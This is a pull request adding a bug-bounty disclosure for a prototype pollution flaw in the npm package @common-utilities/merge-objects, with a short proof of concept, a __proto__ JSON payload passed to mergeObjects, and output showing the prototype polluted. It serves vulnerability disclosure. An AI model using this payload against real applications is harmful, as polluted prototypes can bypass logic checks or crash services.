### PR TITLE
Prototype Pollution in @common-utilities/merge-objects

### DIFF
--- a/bounties/npm/@common-utilities/merge-objects/1/README.md
+++ b/bounties/npm/@common-utilities/merge-objects/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`@common-utilities/merge-objects` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+// poc.js
+var a = require("@common-utilities/merge-objects")
+const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
+var obj = {}
+console.log("Before : " + {}.polluted);
+a.mergeObjects(obj, payload);
+console.log("After : " + {}.polluted);
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i @common-utilities/merge-objects # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```


### PR DESCRIPTION
`@common-utilities/merge-objects` is vulnerable to `Prototype Pollution`